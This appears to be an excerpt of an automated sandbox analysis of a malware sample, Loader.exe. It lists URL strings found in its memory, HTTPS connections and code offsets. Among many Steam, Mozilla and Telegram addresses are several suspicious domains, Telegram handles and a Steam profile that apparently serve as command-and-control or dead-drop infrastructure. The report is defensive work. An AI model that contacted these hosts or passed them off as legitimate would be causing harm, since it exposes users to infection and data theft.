                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&am
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=LrC2xWhJTNZp&l=e
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
                Source: Loader.exe, 00000002.00000003.2544111488.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244391216.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666316182.0000000003515000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244319889.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fostinjec.today/LksNAzx
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://modelshiverd.icu/bJhnsj
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665825514.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244460225.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665825514.0000000000DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/p
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: Loader.exe, 00000002.00000003.2244391216.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2544255250.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665739279.0000000000D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sterpickced.digital/
                Source: Loader.exe, 00000002.00000003.2244335474.0000000000DE6000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2665806181.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sterpickced.digital/BA
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Loader.exe, 00000002.00000003.1435554648.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Loader.exe, 00000002.00000003.1435499544.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asdawfq
                Source: Loader.exe, 00000002.00000002.2665667377.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asdawfqvd
                Source: Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=aba847841a9f2f61b5_131170306833
                Source: Loader.exe, 00000002.00000003.1435518173.0000000000D7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.orgX-Frame-OptionsALLOW-FROM
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Loader.exe, 00000002.00000003.1552310556.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: Loader.exe, 00000002.00000003.1488676251.00000000034DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Loader.exe, 00000002.00000003.1551720195.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: Loader.exe, 00000002.00000003.2244305057.0000000003516000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.2244248121.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.2666330247.000000000351A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                Source: Loader.exe, 00000002.00000003.2244248121.0000000000E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.77.86:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000614100_2_00061410
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00042D000_2_00042D00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00026D700_2_00026D70
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00061E400_2_00061E40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000210000_2_00021000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007B8000_2_0007B800
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000960000_2_00096000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002B8100_2_0002B810
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000318100_2_00031810
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004D8100_2_0004D810
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000488200_2_00048820
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002E02C0_2_0002E02C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000648300_2_00064830
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000728300_2_00072830
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000368400_2_00036840
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0002A0500_2_0002A050
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0004A0500_2_0004A050
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007F8700_2_0007F870
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0007C8700_2_0007C870
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0009009A0_2_0009009A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000668900_2_00066890
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_000810900_2_00081090
